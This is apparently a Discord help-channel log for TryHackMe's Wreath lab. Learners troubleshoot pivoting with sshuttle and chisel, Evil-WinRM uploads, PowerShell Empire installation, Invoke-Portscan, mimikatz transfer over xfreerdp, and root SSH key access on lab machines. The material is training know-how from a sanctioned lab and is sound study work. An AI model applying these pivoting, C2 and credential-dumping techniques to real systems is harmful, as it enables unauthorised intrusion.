fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'PREROUTING', '-j', 'sshuttle-12300'] returned 1
fw: fatal: fw: ['iptables', '-t', 'nat', '-I', 'OUTPUT', '1', '-j', 'sshuttle-12300'] returned 4
c : fatal: cleanup: ['/usr/bin/sudo', '-p', '[local sudo] Password: ', '/usr/bin/env', 'PYTHONPATH=/usr/lib/python3/dist-packages', '/usr/bin/python3', '/usr/bin/sshuttle', '--method', 'auto', '--firewall'] returned 99```
hollow bane
#

why is it sshkeys.txt?

soft violet
#

does it matter?

#

...

hushed cargo
#

It shouldn't

#

I don't think

hollow bane
#

Hmm

#

Try โ€˜-Rโ€™

#

Instead of -r

hushed cargo
#

No

#

That won't work

robust cloak
#

Itโ€™s been a while since I did Wreath, so I donโ€™t exactly remember where/when you had to open up ports on the target machinesโ€™ firewalls, but the way the error message reads seems to suggest your firewall is preventing you from making the proxy

soft violet
merry robin
#

Ah

soft violet
#

Oh

merry robin
#

WSL is really weird with networking. Can't remember if WSL2 fixed it to allow stuff like that

#

@stoic flicker would know.
Hydra: sshuttle in WSL2?

stoic flicker
#

Never got it working

soft violet
#

Oh.

stoic flicker
#

Had to use proxychains and chisel

#

Seems to be some weird networking voodoo interfering with iptables

soft violet
#

Oh, well that's slightly annoying, but at least I know the cause now

#

I have a Kali VM it's just more convenient to use WSL but I guess I can't

soft violet
#

I can read, but that doesn't mean anything to me

strange bison
drowsy nymph
#

I installed powershell-empire, on starting a client its giving me a urllub3 error

#

Although urllib3 is installed already

hollow bane
#
git clone --depth=1 -b dev https://github.com/EmpireProject/Empire.git /opt/Empire && \
cd /opt/Empire/setup/ && \
pip install urllib3==1.22 && \
./install.sh && \
# installer grabs some more stuff from repo - clean it up!
apt-get autoremove -y && \
apt-get clean && \
rm -rf /var/lib/apt/lists/*
#

try if this works.

hollow bane
#

no u

#

Mods

#

@stoic flicker

#

this guy is spamming shit everywhere.

north escarp
#

For task 33, when I connect with Evil-WinRM and with the powershell-empire scripts, I can't run Invoke-Portscan.ps1? The file is uploaded and I tried using "powershell -ep bypass" then . .\Invoke-Portscan.ps1. Also, the error is saying it is not recognized as the name of a cmdlet, function, script file etc

hollow bane
#

if it lists a help menu, you're golden, if not, you'll need to find another way to upload it onto the machine.

north escarp
hollow bane
#

hmm

#

.\Invoke-Portscan.psa1 help?

#

try and replace the h with a H in the help part of the command

north escarp
#

Got it, I tried again with ". .\Invoke-Portscan.ps1" and I am able to run commands

#

Thank you for the help

north escarp
#

When using chisel to forward the webserver, am i supposed to upload chisel through this evil-winrm session or from the other shell we get from using curl? This is for task 34

chilly olive
north escarp
chilly olive
#

no problem

north escarp
hollow bane
#

And make sure to be the administrator with the admin hash.

north escarp
winter lintelBOT
#

Gave +1 Rep to @hollow bane

chilly olive
fresh fossil
#

hello im a subscriber but I do not know why i don't have access to wreath network

merry robin
north escarp
hollow bane
#

That's what I did, and if you don't mind ||you have to remove the files later in the room, so it doesn't matter where you upload them.||

north escarp
winter lintelBOT
#

Gave +1 Rep to @hollow bane

north escarp
# hollow bane no problem

I probably wont be able to work on wreath until the end of the week so I will let you know friday if I am still having the same issue

solar mist
#

Did the default creds for starkiller change?

#

update: had to change them using the password and username args

#

it's 404'ing the login request from starkiller now, tho

#

I guess it's time to master the CLI then..

weak tree
#

if you don't finish the room in the allotted time do your points/the entire room reset or can you pick back up from where you were?

solar mist
#

turns out the github isn't modernized

#

and it's 2 major releases behind

#

aka 6 years

hushed cargo
hollow bane
#

so keep this if you want to attack all the machines all over again.

hushed cargo
#

True

#

But if you have good notes it's just a matter of swapping IP's out

sharp linden
#

Hey guys, I need a sanity check. I've done a couple of full TCP scans on the first box, but apart from the first attempt, NMAP cannot find the HTTP service that I found on both the NMAP and by using the browser. Have I done something wrong?

hollow bane
#

Also use rustscan, itโ€™s waaayyy faster

drowsy nymph
#

why the first machine is not acceptin ssh connection? it is returning 'its garbled time'

hollow bane
#

mind sharing a screenshot?

hushed cargo
north escarp
#

Still getting the same issue with uploading chisel. "Error: Upload failed. Check filenames or paths"\

drowsy nymph
#

I'm not getting the option of sending images on this channel

thin crescentBOT
drowsy nymph
hushed cargo
#

Iirc you don't ssh as root for any part of wreath

drowsy nymph
#

I have the ssh key of root, how do i gain a ssh shell?

hollow dirge
#

Have you tried adding -v for verbose output? This may help identify the issue.

drowsy nymph
#

still not able to identify the issue

hollow dirge
#

hmm not sure. You could try a more verbose output -vvv in case that reveals any more.

surreal sail
#

i think wreath needs a reset ๐Ÿ˜ฆ

#

can someone please vote ๐Ÿ™

#

10.200.188.200

twin gust
willow ferry
#

anyone on 10.200.104.200?

#

think I need a reset

willow ferry
#

no matter, was my VPN config, seemed to be confused, switched back to VIP and re-downloaded Wreath profile, all working now.

ashen aspen
#

Help

willow ferry
#

Please provide more information on what you need help with. Generally speeds things up. ๐Ÿ™‚

hushed cargo
#

What exactly do you need help with

ashen aspen
hushed cargo
#

You my friend are in the wrong channel then

ashen aspen
#

Or @

hushed cargo
ashen aspen
#

Ok thanks

knotty sphinx
#

Hello all, somebody have trouble to ssh on 10.200.188.200 ? the port 22 seems to be filtered ๐Ÿ˜ฆ

hushed cargo
#

!docs verify

thin crescentBOT
hushed cargo
knotty sphinx
#

done for the verify step ๐Ÿ™‚

and this is the screen about ssh trouble :/

hushed cargo
#

Interesting. Try reseting the network

gritty cosmos
#

this room is so amazing

#

really helped iron out many details

gritty cosmos
#

Question with uploading Invoke-portscan

#

i see the ruby error, but apt install ruby-full did not help

willow ferry
#

can you load the file/script first?

#

not super familiar with Evil-winrm

hushed cargo
#
Import-Module .\Invoke-Portscan.ps1
gritty cosmos
#

i think its this aswell

#

but ima try

hushed cargo
#

Then you'll be able to use

Invoke-Portscan

To invoke the script

hushed cargo
gritty cosmos
#

pretty sure yeah it is brother

#

Remote path completion
This feature could be not available depending of the ruby you are using. It must be compiled with readline support. Otherwise, this feature will not work (a warning will be shown).

Method 1 (compile the needed extension)
Using this method you'll compile ruby with the needed readline feature but to use only the library without changing the default ruby version on your system. Because of this, is the most recommended method.

#

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
my error:

#

powershell is def not case sensitive

hushed cargo
#

Also, did you just not used the invoke ports and script?

gritty cosmos
#

but there ya go

#

why wont you read my error?

#

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

lusty saffron
#

Isn't there -s flag for evil-winrm to provide a directory containing .ps1 files๐Ÿค”

gritty cosmos
#

remoter path completion is from my box

#

yeah

#

im doing that

hushed cargo
gritty cosmos
#

its a ruby error

#

thanks anyway ima try to compile it with /ext/readline like its saying

#

....

#

thanks anyway broooo

hushed cargo
#

Send a screenshot of your evil-winrm command

#

Your issue isn't remote path completion lol

gritty cosmos
#

lol that is exactly my issue by definition

lusty saffron
#

Did you transfer the file?๐Ÿ˜…

hushed cargo
#

The error your getting is because you're trying to run a script that dosent exist

gritty cosmos
#

why wont you leave me alone?

hushed cargo
#

You asked for help?

#

Read your error message. FileNotFoundError

gritty cosmos
#

i get what you are saying bro, but you are sayiung power shell is case sensitive. i dont want yo help

#

so please, leave me alone

hushed cargo
#

That's not what I said lol

#

Bit ok

gritty cosmos
#

fair enough, other dude said tha

hushed cargo
#

I told you what your problem is. If you don't wanna listen then by all means do what you want

merry robin
#

๐Ÿ‘€

digital turret
#

HII

surreal sail
#

having problems with task 35, cannot download the Website, it's showing as download successful ... but then nothing in my local directory. Any ideas?

#

entering the full path of the file looks to have fixed the problem ๐Ÿ™‚

gritty cosmos
# merry robin ๐Ÿ‘€

Finished wreath with out issues, thanks so much again. Really learned a lot, and got the chance to work though trouble shooting. The Empire section was great I learned more than the pwk-200 pdf section on it. All of your rooms are great for that mater. Thank you. cheers. XD

winter lintelBOT
#

Gave +1 Rep to @merry robin

valid acorn
#

ay

analog sinew
#

Hello! I have lost the connection with the machine by SSH, the environment says that it is running, but I try to connect and it does not leave me as I normally do. I am in parallel with a partner and it does not work like me

sturdy merlin
#

Ping the ip to check if itโ€™s active

last vigil
#

when running the http server and using http_hop listener

#

when i plug in the super long powershell script used when executing the multi hadnler

#

nothing happens

hollow bane
#

Yes

#

Empire bad

#

Try using other C2 frameworks

last vigil
#

hey

#

could someone help me on the last task of wreaht

#

i cant seem to transfer the .exe file

mortal sluice
#

hey guys, I'm just curious about the last question on task#6

#

"then use the command 'chmod 600 KEY_name' to obtain persistent access to the box"

#

why not doing straight "ssh -i {name_of_key} root@{IP}"

#

why the need of 'chmod 600 {key_name}' ?

#

oh I guess in case we don't have the right perm on the file ... okay nvm

hushed cargo
#

Yea. ssh private keys need ti only be accessible by the owner of the key. If there are any added permissions the key won't work

topaz mortar
#

I am stuck on Task 34, Wappalyzer is reporting a certain version number which isn't correct according to the question, has it been changed or something?

merry robin
#

Boxes haven't been updated

#

One sec

topaz mortar
#

@merry robin || PHP 5.4.3 ||

#

Oh wait, It may me being a derp

#

Okay, Now i am more confused, Task 34, i am supposed to chisel the gitserver or personal machine?

merry robin
#

You should be using chisel on the gitserver to access the personal PC

#

Wappalyzer should be used on the personal PC

topaz mortar
#

When i say Personal PC, i mean the last machine in the chain.

#

So right now i have Chisel server on GitServer and Chisel Client on my Attacking Machine and Wappa is giving that result i said.

merry robin
#

Can you screenshot your web browser with Wappalyzer open? @topaz mortar

#

As in, show me the web page you're looking at

topaz mortar
#

@merry robin

merry robin
#

That ain't the personal PC -- that's the gitserver you're looking at

topaz mortar
#

Okay, as i guessed. Will re-read the stuff, must missed something

merry robin
#

You've definitely got mixed up somewhere with the forwarding ๐Ÿ˜„

topaz mortar
#

Yeah

pearl holly
#

What are my limitations on this network if I've 7 day streak badge(not the streak at the moment) and no subscription.

merry robin
#

You need an active 7-day streak to join, but after that, none :)

uneven palm
#

Great room!!! For the cleaning of your tracks at the end. Do it in the right order otherwise it's a challenge & problem.๐Ÿ‘

glacial monolith
#

I think someone messed up the rsa key on 10.200.187.200. They also put their tuno there lol

glacial monolith
#

Yeah it's broken

hushed cargo
#

So reset the network

glacial monolith
#

takes 8 people

hushed cargo
#

Ik. It'll take you bit. You can vote once every hour tho, so not forever

signal frost
#

Why is this root hash in a different format than what THM is asking for lol

#

@merry robin help plx

bold talon
#

Hello guys
I'm stuck in the Wreath task 20 since 2hours now

=> I've downloaded the exploit correctly and when i execute, i have an error (No modules named requests)

=> I've tried python2 and requests reinstallation but they say request requirements are already satisfied.

Don't know how to solve it , can someone help or guide me?!

hushed cargo
#

try pip3 install requests

merry robin
merry robin
winter lintelBOT
#

Gave +1 Rep to @merry robin

hushed cargo
merry robin
#

Np :)

hushed cargo
#

Been a while since I did this network. I need to redo it and take better notes

midnight breach
#

try to remove the requests mdoule and reinstall with python2 -m pip install requests

merry robin
#

Or better yet, figure out virtual environments rather than fucking up your device env

lofty beacon
#

Hi, The password hash for root is different to what THM is asking for

vague sparrow
#

Hey I have a question, I added the ip like it is described to my /etc/hosts but if I want to access the web page I get an timeout every time
has anyone had that problem before?

hushed cargo
#

@stoic flicker

hollow girder
#

Hi

buoyant island
#

hello

#

can i help you

cold finch
#

Port 22 on the target machine will only be accessible if you pivot successfully.

#

Also I don't think anyone will open the link.

buoyant island
#

I follow the official documentation, but I canโ€™t connect

buoyant island
cold finch
#

I think you need to add the address of your initial target after -x so it is excluded.

#

At work atm, will look into the room in a bit.

buoyant island
#

hello

buoyant island
#

hello

#

Is anyone online?

short dust
#

@buoyant island

buoyant island
short dust
#

Someone has the Invoke-PortScan script?

buoyant island
#

no

#

@gritty cosmosI have the same problem as you. Has your problem been solved?

hearty gulch
#

i have a technical issue with this network, after i ssh into the first box 10.200.186.200 it is not responsive, i only get to interact with it for a few seconds before it stops responding, stops responding to ping as well, i'm not sure if it's with the other machines yet. \i'm using the in-browser attackbox. i dont think it's my 30Mbps internet connection.

how do i improve this?

gritty cosmos
thin yarrow
#

I'm about to start it. Holy crap that's alot of tasks lol

hollow bane
#

but you do have 10 days to complete it

#

Have fun ๐Ÿ˜„

thin yarrow
#

๐Ÿคฆโ€โ™‚๏ธ

#

lol

#

Oh it says after 10 days you can re-join with saved progress ๐Ÿ™‚

hollow bane
#

yeah

merry robin
#

Yeah -- there isn't a time limit ๐Ÿ™‚

#

You get removed after 10 days to ensure that you're not taking up one of the limited spaces on the network if you're not actually using it / have completed it, but there's nothing stopping you from just rejoining if you still need access (even without a streak) ๐Ÿ™‚

thin yarrow
#

I kinda wanna take a break but I don't wanna have to redo like 3 tasks to get where i was ๐Ÿคฃ I just got to the point where you use the rsa token to get a shell. If I log off and the machine goes inactive will I need to get a new rsa doc or will the same one still work?

hollow bane
#

when you do get removed though, the subnet you are working on will be changed

#

so if you did make good notes, you can work it all back up pretty easily

merry robin
thin yarrow
#

Sweet thanks @merry robin I can see where some things will have to go back and redo a few steps but if certain aspects stay the same then that's awesome. I'm gonna try to bust this out in 2-3 days though lol

winter lintelBOT
#

Gave +1 Rep to @merry robin

thin yarrow
#

I'm terrible with notes but I am taking them ๐Ÿคฃ

thin yarrow
#

So much reading and googling xD

thin yarrow
#

Welp I screwed something up lol
I accidentally deleted the key that got way back in like task 6.. Now I'm trying to get back in with webmin and I'm getting failed to connect errors

thin yarrow
#

Anyone have the rsa file handy they wouldn't mind sharing for the root ssh of network machine? xD
I can prove I've already moved past this point being on task 18 and we got the rsa in Task 6

thin yarrow
#

boom got it with a bit of webmin magic.. was able to pull the rsa key. Now just have to copy/paste and hope it works

#

yes! Phew... talk about an hour setback xD
Just need to be a bit more care using the rm -r commands ๐Ÿคฃ

limber saffron
#

@surreal sail thank you for this!!! "You are only supposed to copy & paste the hash only, not all other stuff in these other colons (so not the whole line, not the root: and all stuff after the hash :18890:0:99999:7:::" ๐Ÿ˜…

winter lintelBOT
#

Gave +1 Rep to @hushed lark

surreal sail
#

Hi ! I'm having issues with the xrdp part of the wreath room. I'm trying to import mimikatz.exe on the machine but can't make it work. When following the expected solution, I run this command : "xfreerdp /v:10.200.90.150 /u:gavroche /p:mypassword +clipboard /dynamic-resolution /drive:/usr/share/windows,gavroche" but no "gavroche" drive appears... Any idea ? thanks !

thin yarrow
#

That's where I got stuck and eventually gave up 2ish days ago...might come back to it later but it would just not create a shared drive. No idea what was doing wrong

surreal sail
#

Okay thanks, how would you upload mimikatz then ?

thin yarrow
#

That's my point lol I couldn't get it. I'm debating just waiting for enough votes for a reset and starting from scratch with better note taking

surreal sail
#

K thanks. If anyone can think of anything... Would be appreciated ๐Ÿ˜‰

split harbor
#

if ssh was an option scp could be used but doubt it is even an option in this case

thin yarrow
#

After being stumped for an hour or 2 I even went and watched darks walk through of that one (and a couple before it) with no luck ๐Ÿคฃ I claim it's just broked

surreal sail
#

I found a Fix !!

#

Just put everything you need on your home folder and use the following command :

#

xfreerdp /v:10.200.90.150 /u:gavroche /p:mypassword +home-drive

#

Enjoy ๐Ÿ˜‰

steady sluice
#

going back to the network after a while, cant start is.. why? dont have any buttons (start\reset etc)

hushed cargo
fast geode
#

I have a question, I am trying to work through the wreath network and I am stuck on task 6; someone has removed the id_rsa.pub file can we just regenerate a key pair or does it have to be the original one?

ancient oasis
strange bison
#

That would ruin the machine

fast geode
crystal hedge
#

Does anyone know what the number is for network resets? I have been waiting since last night for a Wreath reset, and the number needed was 16, now we are needing 20 reset requests, it almost seams like every time someone requests a reset the number needed to reset the network goes up.

merry robin
merry robin
#

Oh FFS

#

@limber rover any chance you could remove the people from my dev network again? ๐Ÿ˜†

crystal hedge
merry robin
#

Yeah. Basically what's happened is the number of users in the room has exceeded the number of networks available, so every new user is now getting dumped into the first instance of the network

#

Which is why there are about 100 people in my dev network rn

crystal hedge
#

๐Ÿ˜† got it.

#

There are a lot of people in the room, just looked at the count, 6075. That is impressive for how old the room is.

strange bison
merry robin
#

Looks like it

strange bison
#

RIP

steady sluice
waxen orbit
#

Go to settings icon and select leave and then joinWreath room again.

crystal hedge
clear pewter
#

New to pivoting, was attempting to pivot to the second host via sshuttle. When I try to use the private key obtained previously, I get the following: Permission denied (publickey,gssapi-keyex,gssapi-with-mic). Would be grateful for any pointers. Thanks in advance.

merry robin
clear pewter
#

@merry robin apologies I just realized because of your comment that I added the wrong screenshot. The following is the correct one:

merry robin
#

There's a formatting error there

#

Try using it to login over SSH?

clear pewter
#

I tried similar issue

clear pewter
#

@merry robin creating the id_rsa file using nano, pasting the contents of the private key into nano, and making sure that there are no leading and/or trailing spaces solved the issue. Previously I was creating a blank document from the GUI via right click. Thanks for taking an interest.

winter lintelBOT
#

Gave +1 Rep to @merry robin

candid cipher
#

Ok i have a question?
i'm trying to log in via ssh
ssh -i id_rsa root@10.200.94.200
And 10.200.94.200 is asking for a password??

clear pewter
#

@candid cipher unless a change in the sshd config file, on the compromised host was made, possibly even by someone else other than yourself, I do not think that you should experience this situation,...how far off is your network from a reset?

safe osprey
#

Loving this room so far, just managed to exploit the gitserver and now moving onto the final stage.

gritty cosmos
#

it's def a great netowrk

crystal hedge
#

I would really like to work on this network, but I and a few others are still stuck in a development network. I have tried leaving and rejoining the room but I keep getting dropped into the dev network. Can I please get some help?

safe osprey
normal drift
#

Now that I have a seven-day streak, I'm starting up on this!

minor lantern
#

What's the 9 days? What happens after 9 days pass.

#

nvm, was explained later

minor lantern
#

What's up with the root user's password hash in task 6, it's saying incorrect

#

oddly enough the root hash in the guide video is different while the twreath user one is the same

crystal forge
#

I am having a problem with SSH remote port forwarding on Task-20 Git server enumeration
What i am trying to achieve is a remote connection from the Internal netwrork (150) via ssh remote port forwarding but it doesn't return the shell on the local machine but it does return shell on ssh (compromised web server)

strange bison
#

@merry robin is it worth making a cronjob next time you update that box so that the hash is replaced with the correct one every 5mins or something?

#

And or chattr shadow

royal lynx
#

i am unable to download the website.git folder from the win-system using winRM, what should i do?

hushed cargo
royal lynx
#

download C:\Gitstack\repositories\website.git

royal lynx
lusty saffron
#

@waxen orbit psyDuck

waxen orbit
#

-mute 477272021416542208

winter lintelBOT
#

๐Ÿ”‡ Muted !โฒ˜๊ž„-DesTroYeR#3679 for 1 day

rugged moth
#

Any tips? Wreath network appears to be running, and it was working perfectly fine earlier. But I am now connected to the VPN but cannot reach the first target. Can't even ping it. I've rebooted my Kali box, checked all my connectivity, including from another PC. Is it possible for the network to be running but messed up by other users and completely unreachable?

cold stump
rugged moth
#

Seems to be fine now. Temperamental I guess.

merry robin
#

Because they get root access on the first box (which is required for some of the next pivoting), they can break stuff

#

If you catch anyone doing it, let me know and I'll chuck them out the room

lusty saffron
merry robin
#

Not without removing realism, so, no

#

Also, getting Webmin to run without root privileges is next to impossible

#

i.e. the initial access can't be anything other than insta-root

minor dawn
#

getting some errors on the exploit for the git server, anyone else facing this? About to look into the script itself but asking in case this is a known problem

round tree
#

How am I meant to check if wreath is running? There isn't any 'network status' text and there are no start buttons either

minor dawn
#

oopz

#

nooo spoilerz

round tree
minor dawn
#

I didn't know both of them were windows :<

#

also that's whack

merry robin
#

Speaking of which @limber rover, could you possibly do something about the 150 odd people who ended up in my dev network? ๐Ÿ™‚

#

I assume there are still more coming in as well

limber rover
minor dawn
merry robin
#

I did wonder when he asked for the subnet IP ๐Ÿ˜†

#

But yeah, 32 people to reset is a bit off

round tree
#

i really wish I knew where my start buttons went though

merry robin
round tree
#

I'm coming back to it after months, i've already completed some tasks